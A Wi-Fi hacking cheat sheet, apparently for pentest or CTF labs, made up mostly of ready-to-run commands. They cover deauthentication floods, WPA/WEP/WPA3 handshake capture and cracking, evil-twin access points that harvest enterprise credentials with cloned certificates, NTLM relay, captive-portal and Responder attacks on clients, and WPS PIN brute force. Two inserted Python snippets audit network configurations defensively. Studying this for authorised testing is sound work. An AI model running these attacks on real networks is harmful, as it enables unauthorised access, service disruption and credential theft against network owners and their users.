Hacking Wi-Fi

Useful commands

Login and get the flag

curl -D - -s -d 'Username=admin&Password=admin&Submit=Login' -c $cookies -b $cookies -L http://<IP Address>/login.php | grep -iE 'flag{.+}'

Preparing The System

It is recommended to execute this command to kill some processes that may interfere with the different attack procedures:

sudo airmon-ng check kill

Monitor Mode

Start

Method 1

sudo ip link set <Wifi Device> down
sudo iwconfig <Wifi Device> mode monitor
sudo ip link set <Wifi Device> up

Method 2

sudo airmon-ng start <Wifi Device>

Stop

sudo airmon-ng stop <Wifi Monitor Device>
sudo ifconfig <Wifi Device> up

Enumeration

List APs and their channels

sudo iw dev <Wifi Device> scan | egrep "DS Parameter set|SSID:"

Scan Networks

To write the captured packets to a file, append -w <Filename> --output-format pcap to the command.

Scan All Networks

sudo airodump-ng <Wifi Monitor Device> --band abg --wps

Scan Networks By Channel

sudo airodump-ng <Wifi Monitor Device> --band abg --wps -c <Network Channel>

Scan Network By ESSID (Name)

sudo airodump-ng <Wifi Monitor Device> --band abg --wps --essid <Network Name>

Scan Network By BSSID (MAC Address)

sudo airodump-ng <Wifi Monitor Device> --band abg --wps --bssid <Network MAC Address>

Discover Hidden ESSID (Name)

Without Connected Clients

It is mandatory to configure the channel with iwconfig before running mdk4.

sudo iwconfig <Wifi Monitor Device> channel <Wifi Channel>
sudo mdk4 <Wifi Monitor Device> p -t <Wifi MAC Address> -f <Wordlist>

With Connected Clients

sudo airodump-ng <Wifi Monitor Device> --band abg --bssid <Network MAC Address>
sudo aireplay-ng -0 6 -a <Network MAC Address> --ignore-negative-one <Wifi Monitor Device>

Discover Information About Hidden AP

  1. Create a HostAPD configuration file:
interface=<Wifi Device>
driver=nl80211
hw_mode=g
channel=1
ssid=<Wifi Name>
mana_wpaout=hostapd.hccapx
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase=12345678
  2. Connect to the AP: hostapd-mana <Filename>.conf
  3. Airodump-NG will receive the AP information

PcapFilter

  • Find POST data: pcapFilter.sh -P -f <Filename> | sort -u
  • Find Identities: pcapFilter.sh -I -f <Filename> | sort -u
  • Find Certificates: pcapFilter.sh -C -f <Filename> | sort -u

Connect To Network

Nmcli

Open Network

  1. Create the connection: sudo nmcli con add type wifi ifname <Wifi Device> con-name <Custom Alias> ssid <Network Name>
  2. If it is a hidden network: sudo nmcli con modify <Custom Alias> wifi.hidden yes
  3. Connect: sudo nmcli con up <Custom Alias>

WEP

  1. Create the connection: sudo nmcli con add type wifi ifname <Wifi Device> con-name <Custom Alias> ssid <Network Name>
  2. If it is a hidden network: sudo nmcli con modify <Custom Alias> wifi.hidden yes
  3. Set management off: sudo nmcli con modify <Custom Alias> 802-11-wireless-security.key-mgmt none
  4. Set password: sudo nmcli con modify <Custom Alias> 802-11-wireless-security.wep-key0 "0x<Password>"
  5. Set the WEP transmit key index: sudo nmcli con modify <Custom Alias> 802-11-wireless-security.wep-tx-keyidx 0
  6. Connect: sudo nmcli con up <Custom Alias>

WPA/WPA2

  1. Create the connection: sudo nmcli con add type wifi ifname <Wifi Device> con-name <Custom Alias> ssid <Network Name>
  2. If it is a hidden network: sudo nmcli con modify <Custom Alias> wifi.hidden yes
  3. Set management on and encryption type: sudo nmcli con modify <Custom Alias> wifi-sec.key-mgmt wpa-psk
  4. Set password: sudo nmcli con modify <Custom Alias> wifi-sec.psk "<Password>"
  5. Connect: sudo nmcli con up <Custom Alias>

nmcli (simpler)

  • OPN
nmcli device wifi connect <SSID_NAME>
  • WEP
nmcli device wifi connect <SSID_NAME> password <PASSWORD>
  • WPA/2 PSK
nmcli device wifi connect <SSID_NAME> password <PASSWORD>
  • WPA3-SAE
nmcli device wifi connect <SSID_NAME> password <PASSWORD>
  • WPA/2 Enterprise (MGT)
nmcli device wifi connect <SSID_NAME> password <PASSWORD> identity <USERNAME> eap PEAP phase2-auth MSCHAPV2

WPA_Supplicant

Create The Configuration File

A configuration file with a custom name and .conf extension needs to be created.

OPEN

network={
    ssid="<Wifi Name>"
    key_mgmt=NONE
    scan_ssid=1
}

WEP

network={
  ssid="<Wifi Name>"
  key_mgmt=NONE
  wep_key0=<Password>   # hex key without ':'
  wep_tx_keyidx=0
}

WPA/2

network={
  ssid="<Wifi Name>"
  scan_ssid=1
  psk="<Password>"
  key_mgmt=WPA-PSK
}

WPA-MGT

network={
  ssid="<Wifi Name>"
  scan_ssid=1
  key_mgmt=WPA-EAP
  identity="<[domain\]Username>"
  password="<PASSWORD>"
  eap=PEAP
  phase1="peaplabel=0"
  phase2="auth=MSCHAPV2"
}

WPA3 SAE

network={
  ssid="<Wifi Name>"
  scan_ssid=1
  psk="<PASSWORD>"
  key_mgmt=SAE
  ieee80211w=2
}

Connect

Once the configuration file has been created, the following command must be executed to access the Wi-Fi network.

xterm -e sudo wpa_supplicant -i <Wifi Device> -c <Custom Name>.conf [-D nl80211] &

Next, in a new terminal, run dhclient on the same Wi-Fi interface to obtain an IP address.

sudo dhclient <Wifi Device> -v [-r]
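The network blocks above, read the other way round: an added example (not part of this cheat sheet) that parses wpa_supplicant network={...} blocks and flags the settings that the attacks later on this page rely on (WEP keys, WPA-EAP without server certificate validation, SAE without PMF, short PSKs). The sample configuration is constructed; the audit rules and finding texts are my own, not wpa_supplicant output.

```python
import re

# Constructed sample: one block per profile type shown above (not a real site).
SAMPLE_CONF = r"""
network={
  ssid="corp-wep"
  key_mgmt=NONE
  wep_key0=1234567890
}
network={
  ssid="corp-mgt"
  key_mgmt=WPA-EAP
  identity="corp\alice"
  password="hunter2"
  eap=PEAP
  phase1="peaplabel=0"
  phase2="auth=MSCHAPV2"
}
network={
  ssid="corp-sae"
  psk="correct horse battery"
  key_mgmt=SAE
  ieee80211w=2
}
"""
BLOCK_RE = re.compile(r"network=\{(.*?)\}", re.S)

def parse_networks(text):
    """Return one dict per network={...} block; '#' comments are stripped."""
    nets = []
    for body in BLOCK_RE.findall(text):
        net = {}
        for line in body.splitlines():
            line = line.split("#", 1)[0].strip()
            if "=" in line:
                key, _, val = line.partition("=")
                net[key.strip()] = val.strip().strip('"')
        nets.append(net)
    return nets

def audit(net):
    """Findings for one block, each naming the attack on this page it enables."""
    findings = []
    mgmt = net.get("key_mgmt", "")
    if any(k.startswith("wep_key") for k in net):
        findings.append("WEP: RC4 keystream recoverable from captured IVs (aircrack-ng)")
    if "WPA-EAP" in mgmt and not any(k in net for k in ("ca_cert", "domain_match", "domain_suffix_match")):
        findings.append("WPA-EAP without ca_cert/domain_match: a rogue AP with a look-alike "
                        "certificate is accepted, exposing the inner " + net.get("phase2", "auth")
                        + " exchange (hostapd-mana/EAPHammer)")
    if "SAE" in mgmt and net.get("ieee80211w") != "2":
        findings.append("SAE without ieee80211w=2: protected management frames not required")
    if "psk" in net and len(net["psk"]) < 12:
        findings.append("short PSK: cheap offline dictionary attack on the captured handshake")
    return findings

def audit_conf(text):
    """Map each SSID to its findings (an empty list means nothing flagged)."""
    return {n.get("ssid", "?"): audit(n) for n in parse_networks(text)}
```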

Sniffing the Network Traffic

Capture and Analyse

  1. Identify a client’s MAC Address: sudo airodump-ng <Wifi Monitor Device> --band abg --wps -c <Wifi Channel>
  2. Stop Network-Manager: sudo systemctl stop network-manager
  3. Set down the Wifi device: sudo ip link set <Wifi Device> down
  4. Change the MAC Address: sudo macchanger -m <Client MAC Address> <Wifi Device>
  5. Set up the Wifi device: sudo ip link set <Wifi Device> up
  6. Start sniffing: sudo airodump-ng <Wifi Monitor Device> -c <Wifi Channel> -w <Filename> --output-format pcap
  7. Analyse PCAP file: sudo wireshark -r <Filename>-01.cap

Decrypt Captured Airodump Pcap and Analyse

You must have sniffed the handshake to be able to decrypt the traffic.

  1. Decrypt the pcap (the output is written to <Filename>-01-dec.cap): airdecap-ng -e <Wifi Name> -p <Wifi Password> <Filename>-01.cap
  2. Analyse the decrypted PCAP file: sudo wireshark -r <Filename>-01-dec.cap

Exploitation

Fake Access Point

WPA/2 (PSK)

  1. Create a hostapd configuration file like so with custom name and .conf extension:
interface=<Wifi Device>
driver=nl80211
hw_mode=g
channel=<Spoofed Wifi Channel>
ssid=<Spoofed Wifi Name>
mana_wpaout=hostapd.hccapx
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
# Ex: 12345678
wpa_passphrase=<Password>
  2. Create the fake AP as root: xterm -e hostapd-mana <Filename>.conf &
  3. Perform a deauthentication attack against the original network: xterm -e sudo aireplay-ng -0 0 -a <Wifi MAC Address> <Wifi Monitor Device> [-c <Client MAC Address>] &
  4. Crack the password once the handshake has been received:
    1. Method 1: hashcat -a 0 -m 2500 hostapd.hccapx <Wordlist> --force
    2. Method 2:
      1. hcxhash2cap --hccapx=hostapd.hccapx -c aux.pcap
      2. hcxpcapngtool aux.pcap -o hash.22000
      3. sudo hashcat -a 0 -m 22000 hash.22000 <Wordlist> --force

WEP password

  1. Find available networks: sudo airodump-ng <Wifi Monitor Device> --band abg --encrypt WEP
  2. Start capturing packets: xterm -e sudo airodump-ng <Wifi Monitor Device> --band abg --bssid <Wifi MAC Address> -c <Wifi Channel> -w <Filename> --output-format pcap &
  3. Generate traffic:
    1. With clients connected:
      1. Perform a fake authentication: xterm -e sudo aireplay-ng -1 3600 -q 10 -a <Wifi MAC Address> <Wifi Monitor Device> &
      2. Perform a replay attack (most effective): xterm -e sudo aireplay-ng -3 -b <Wifi MAC Address> -h <Source MAC Address> <Wifi Monitor Device> &
    2. Without clients connected:
      1. Set the device channel: sudo iwconfig <Wifi Device> channel <Wifi Channel>
      2. Perform a fake authentication: sudo aireplay-ng -1 0 -e <Wifi Name> -a <Wifi MAC Address> -h <Device MAC Address> <Wifi Monitor Device>
      3. Save the keystream file (fragmentation attack): sudo aireplay-ng -5 -b <Wifi MAC Address> -h <Device MAC Address> <Wifi Monitor Device>
      4. Create the ARP request packet from the keystream: packetforge-ng -0 -a <Wifi MAC Address> -h <Device MAC Address> -y <Keystream File>.xor -w <ARP Packet File> -k 255.255.255.255 -l 255.255.255.255
      5. Inject the ARP request packet: aireplay-ng -2 -r <ARP Packet File> <Wifi Monitor Device>
  4. Crack the password: aircrack-ng -b <Wifi MAC Address> <Filename>-01.cap

WPA/2 (PSK) password

Visible AP

  1. Find available networks: sudo airodump-ng <Wifi Monitor Device> --band abg
  2. Start capturing packets: xterm -e sudo airodump-ng <Wifi Monitor Device> --band abg --bssid <Wifi MAC Address> -c <Wifi Channel> -w <Filename> --output-format pcap &
  3. Perform a deauthentication attack: xterm -e sudo aireplay-ng -0 0 -a <Wifi MAC Address> <Wifi Monitor Device> [-c <Client MAC Address>] &
  4. Crack the password: aircrack-ng <Filename>-01.cap -b <Wifi MAC Address> -w <Wordlist>

Hidden AP

  1. Create a HostAPD configuration file:
interface=<Wifi Device>
driver=nl80211
hw_mode=g
channel=1
ssid=<Wifi Name>
mana_wpaout=hostapd.hccapx
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase=12345678
  2. Connect to the AP: hostapd-mana <Filename>.conf
  3. Stop HostAPD-Mana when the AP-STA-POSSIBLE-PSK-MISMATCH message has been received
  4. Crack the handshake with Hashcat: hashcat -a 0 -m 2500 hostapd.hccapx <Wordlist> --force

WPA3 SAE

Brute Force

The wacker tool (https://github.com/blunderbuss-wctf/wacker) must be run as root.

  1. Get the frequency in MHz (e.g. 2462): sudo iwlist <Wifi Device> frequency | grep -i 'Channel <Channel Number>' | awk '{print int($4 * 1000)}'
  2. Execute the attack: wacker.py --wordlist <Wordlist> --ssid <Wifi Name> --bssid <Wifi MAC Address> --interface <Wifi Device> --freq <Frequency>

With Fake Access Point

  1. Capture information in CSV format: sudo airodump-ng <Wifi Monitor Device> --band abg --wps -w <Filename> --output-format csv
  2. Check if the network also supports WPA2 PSK: grep 'PSK' <Filename>-01.csv
  3. Perform a Fake Access Point attack.
  4. Set the monitor device channel: sudo iwconfig <Wifi Monitor Device> channel <Wifi Channel>
  5. Perform a deauthentication attack: xterm -e sudo aireplay-ng -0 0 -a <Wifi MAC Address> <Wifi Monitor Device> [-c <Client MAC Address>] &
  6. Crack the hccapx file as described under Fake Access Point
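The CSV written in step 1, parsed rather than grepped: an added example (not part of this cheat sheet) that reads the airodump-ng CSV layout and reports, per network, what the 'grep PSK' check in step 2 looks for, namely whether a WPA3 network still advertises WPA2-PSK (transition mode), which is the fallback a network owner should disable. The CSV below is constructed; the posture labels are mine.

```python
import csv
import io

# Constructed sample in airodump-ng's CSV layout: AP table, blank line, station table.
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:DD:EE:01, 2024-05-01 10:00:00, 2024-05-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -45,  120,  0,   0.  0.  0.  0,   7, CorpNet,
AA:BB:CC:DD:EE:02, 2024-05-01 10:00:01, 2024-05-01 10:05:00, 11,  54, WPA3 WPA2, CCMP, SAE PSK, -60,   80,  0,   0.  0.  0.  0,   9, GuestWifi,
AA:BB:CC:DD:EE:03, 2024-05-01 10:00:02, 2024-05-01 10:05:00,  1,  54, WEP, WEP, , -70,   30,  0,   0.  0.  0.  0,   6, Legacy,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
11:22:33:44:55:66, 2024-05-01 10:01:00, 2024-05-01 10:05:00, -50,  40, AA:BB:CC:DD:EE:01,
"""

def parse_airodump_csv(text):
    """Return one dict per access point from the first (AP) table of the CSV."""
    ap_table = text.strip().split("\n\n", 1)[0]      # the station table follows a blank line
    reader = csv.reader(io.StringIO(ap_table), skipinitialspace=True)
    header = [h.strip() for h in next(reader)]
    aps = []
    for row in reader:
        if len(row) >= len(header):                  # skip short or malformed rows
            aps.append(dict(zip(header, (c.strip() for c in row))))
    return aps

def classify(ap):
    """Summarise the security posture airodump-ng observed for one AP."""
    priv = ap["Privacy"].split()
    auth = ap["Authentication"].split()
    cipher = ap["Cipher"].split()
    if "WEP" in priv:
        return "weak: WEP"
    if "OPN" in priv:
        return "open: no encryption"
    if "SAE" in auth and "PSK" in auth:
        return "WPA3 transition mode: WPA2-PSK fallback still enabled"
    if "SAE" in auth:
        return "WPA3-SAE only"
    if "TKIP" in cipher:
        return "weak: TKIP cipher"
    if "MGT" in auth:
        return "WPA-Enterprise (802.1X)"
    if "PSK" in auth:
        return "WPA/WPA2-PSK"
    return "unknown"

def survey(text):
    """Map ESSID to posture: the per-network view behind the grep check above."""
    return {ap["ESSID"]: classify(ap) for ap in parse_airodump_csv(text)}
```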

MGT (Enterprise)

Reconnaissance

  1. Start capturing packets: sudo airodump-ng <Wifi Monitor Device> --band abg --bssid <Wifi MAC Address> -c <Wifi Channel> -w <Filename> --output-format pcap
  2. Set the monitor device channel: sudo iwconfig <Wifi Monitor Device> channel <Wifi Channel>
  3. Perform a deauthentication attack: xterm -e sudo aireplay-ng -0 0 -a <Wifi MAC Address> <Wifi Monitor Device> [-c <Client MAC Address>] &
  4. Analyse PCAP file: sudo wireshark -r <Filename>.cap
    1. Get domain name and usernames:
      1. With Wireshark: sudo wireshark -r <Filename>.cap -Y 'eap.identity != ""'
      2. With Tshark: tshark -r <Filename>.cap -Y '(eap.identity)' -T fields -e eap.identity
    2. Get the email of the certificate server:
      1. With Tshark: tshark -r <Filename>.cap -Y "wlan.bssid == <Wifi MAC Address> && x509sat.IA5String" -T fields -e x509sat.IA5String
    3. View entire SSL certificate information:
      1. With PcapFilter: bash pcapFilter.sh -f <Filename>.cap -C | grep "@" | sort -u
      2. With Wireshark: sudo wireshark -r <Filename>.cap -Y '(wlan.bssid == <Wifi MAC Address>) && (tls.handshake.certificate)'
      3. With Tshark: tshark -r <Filename>.cap -Y "wlan.bssid == <Wifi MAC Address> && ssl.handshake.type == 11" -V
    4. Get the supported EAP methods (and usernames) with EAP_buster (https://github.com/blackarrowsec/EAP_buster): ./EAP_buster.sh "<Wifi Name>" "<Wifi Username>" "<Wifi Device>"

Crack

With Brute Force

  1. Download air-hammer (https://github.com/Wh1t3Rh1n0/air-hammer)
  2. Create the user file: echo '[Domain\]Username' > <User File>
  3. Crack the password: ./air-hammer.py -i <Wifi Device> -e <Wifi Name> -p <Wordlist> -u <User File>

With EAPHammer

  1. Download EAPHammer
  2. Get the entire SSL certificate information (see Reconnaissance above)
  3. Generate the certificates: python3 ./eaphammer --cert-wizard
  4. Start the attack: python3 ./eaphammer -i <Wifi Device> --auth wpa-eap --essid <Wifi Name> --creds --negotiate balanced
  5. Perform a deauthentication attack on the target client over each network to which it is connected: sudo aireplay-ng -0 0 -a <Wifi MAC Address> <Wifi Monitor Device> -c <Client MAC Address>
  6. Crack the hash: hashcat -m 5500 -a 0 <Captured Hash> <Wordlist> --force

With Freeradius and Hostapd-Mana

  1. Install Freeradius: sudo apt install freeradius
  2. Get the entire SSL certificate information (see Reconnaissance above)
  3. View necessary information:
    1. Clean occurrences: tshark -r <Filename>.cap -Y "wlan.bssid == <Wifi MAC Address> && ssl.handshake.type == 11" -V | grep -ow -E '(countryName=\w+)|(stateOrProvinceName=.+)|(localityName=.+)|(organizationName=.+)|(emailAddress=.+)|(commonName=.+)' | cut -d ',' -f 1 | sed 's/)//' | sort -u
    2. Complete occurrences: tshark -r <Filename>.cap -Y "wlan.bssid == <Wifi MAC Address> && ssl.handshake.type == 11" -V | grep 'countryName\|stateOrProvinceName\|localityName\|organizationName\|emailAddress\|commonName'
  4. Modify the certificate_authority section of the /etc/freeradius/3.0/certs/ca.cnf file according to the captured certificate:
[certificate_authority]
countryName             = US
stateOrProvinceName     = CA
localityName            = San Francisco
organizationName        = Playtronics
emailAddress            = ca@playtronics.com
commonName              = "Playtronics Certificate Authority"
  5. Modify the server section of the /etc/freeradius/3.0/certs/server.cnf file according to the captured certificate:
[server]
countryName             = US
stateOrProvinceName     = CA
localityName            = San Francisco
organizationName        = Playtronics
emailAddress            = server@playtronics.com
commonName              = "Playtronics"
  6. Remove the Diffie-Hellman parameters and create the new certificates (make shows an error at the end due to the client configuration; no harm done):
rm /etc/freeradius/3.0/certs/dh
cd /etc/freeradius/3.0/certs/; make
  7. Create the Access Point user file: /etc/hostapd-mana/mana.eap_user
*     PEAP,TTLS,TLS,FAST
"t"   TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2    "pass"   [2]
  8. Create the Access Point configuration file: /etc/hostapd-mana/mana.conf:
# SSID of the AP
ssid=<Spoofed Wifi Name>

# Network interface to use and driver type
# We must ensure the interface lists 'AP' in 'Supported interface modes' when running 'iw phy PHYX info'
interface=<Wifi Device>
driver=nl80211

# Channel and mode
# Make sure the channel is allowed with 'iw phy PHYX info' ('Frequencies' field - there can be more than one)

channel=<Allowed Wifi Channel, 1 to 10 for example>

# Refer to https://w1.fi/cgit/hostap/plain/hostapd/hostapd.conf to set up 802.11n/ac/ax
hw_mode=g

# Setting up hostapd as an EAP server
ieee8021x=1
eap_server=1

# Key workaround for Win XP
eapol_key_index_workaround=0

# EAP user file we created earlier
eap_user_file=/etc/hostapd-mana/mana.eap_user

# Certificate paths created earlier
ca_cert=/etc/freeradius/3.0/certs/ca.pem
server_cert=/etc/freeradius/3.0/certs/server.pem
private_key=/etc/freeradius/3.0/certs/server.key
# The password is actually 'whatever'
private_key_passwd=whatever
dh_file=/etc/freeradius/3.0/certs/dh

# Open authentication
auth_algs=1
# WPA/WPA2
wpa=3
# WPA Enterprise
wpa_key_mgmt=WPA-EAP
# Allow CCMP and TKIP
# Note: iOS warns when network has TKIP (or WEP)
wpa_pairwise=CCMP TKIP

# Enable Mana WPE
mana_wpe=1

# Store credentials in that file
mana_credout=/tmp/hostapd.credout

# Send EAP success, so the client thinks it's connected
mana_eapsuccess=1

# EAP TLS MitM
mana_eaptls=1
  9. Deploy the fake Access Point and wait for a user to log in.
sudo hostapd-mana /etc/hostapd-mana/mana.conf
  10. Perform a deauthentication attack on the target client over each network to which it is connected: sudo aireplay-ng -0 0 -a <Wifi MAC Address> <Wifi Monitor Device> -c <Client MAC Address>
  11. Crack the password:
    1. With Asleap: use the command printed by hostapd-mana, e.g. asleap -C 5f:...:5a -R 7a:...:dd -W <Wordlist>
    2. With Hashcat: hashcat -m 5500 -a 0 <Mana Captured Hash> <Wordlist> --force

Relay NTLM

  1. Set down the Wifi device: sudo ip link set <Wifi Device> down
  2. Set a fake MAC Address: sudo macchanger -m 00:CA:FE:BA:BE:00 <Wifi Device>
  3. Set up the Wifi device: sudo ip link set <Wifi Device> up
  4. Create the WPA_Sycophant configuration file:
network={
  ## The SSID to relay and authenticate against
  ssid="<Wifi Target Name>"
  ## -------------
  scan_ssid=1
  key_mgmt=WPA-EAP
  ## Do not modify
  identity=""
  anonymous_identity=""
  password=""
  eap=PEAP
  ## Change to phase1="peapver=1" in case of failure
  phase1="crypto_binding=0 peaplabel=0"
  ## -------------
  phase2="auth=MSCHAPV2"
  bssid_blacklist=00:CA:FE:BA:BE:00
}
  5. Get the certificate information: bash pcapFilter.sh -f <Filename>.cap -C | grep "@" | grep Issuer | sort -u | cut -d ':' -f 2 | sed 's/,/\n/g'
  6. Start the RogueAP with Berate_ap: ./berate_ap --eap --mana-wpe --wpa-sycophant --mana-credout outputMana.log <Wifi Device> lo <Wifi Name>
  7. Set the monitor device channel: iwconfig <Wifi Monitor Device> channel <Channel>
  8. Start WPA_Sycophant: ./wpa_sycophant.sh -c <Filename>.conf -i <Wifi Device>
  9. Perform a deauthentication attack (repeat if it does not work): sudo aireplay-ng -0 10 -a <Wifi MAC Address> <Wifi Monitor Device> [-c <Client MAC Address>]
  10. Request a DHCP IP: sudo dhclient <Wifi Device> -v

Attacks On Clients

RogueAP With Captive Portal

  1. Stop DNSMasq: sudo killall dnsmasq
  2. Start the attack with EapHammer: python3 ./eaphammer --essid <Rogue Wifi Name> --interface <Wifi Device> --captive-portal
  3. Set the Wifi Monitor Device Channel: sudo iwconfig <Wifi Monitor Device> channel <Channel>
  4. Perform a deauthentication attack on the target client over each network to which it is connected: sudo aireplay-ng -0 0 -a <Wifi MAC Address> <Wifi Monitor Device> -c <Client MAC Address>

RogueAP With Responder

Responder must be installed.

  1. Stop DNSMasq: sudo killall dnsmasq
  2. Start the attack with EapHammer: python3 ./eaphammer --essid <Rogue Wifi Name> --interface <Wifi Device> --hostile-portal
  3. Set the Wifi Monitor Device Channel: sudo iwconfig <Wifi Monitor Device> channel <Channel>
  4. Perform a deauthentication attack on the target client over each network to which it is connected: sudo aireplay-ng -0 0 -a <Wifi MAC Address> <Wifi Monitor Device> -c <Client MAC Address>

WPS

Reaver

Using Reaver you can perform a brute force attack on the WPS pin of the access point.

sudo reaver -i <Wifi Monitor Device> -b <Wifi MAC Address> -vvNwf [-K {1|2|3}] -c <Channel>
  • K: Run the pixie-dust attack
  • vv: Very verbose output
  • N: Do not send NACK messages when out-of-order packets are received
  • w: Mimic a Windows 7 registrar
  • f: Disable channel hopping

Bully

Using Bully you can perform a brute force attack on the WPS pin of the access point.

sudo bully <Wifi Monitor Device> -b <Wifi MAC Address> -c <Channel> -S -F -B -v 3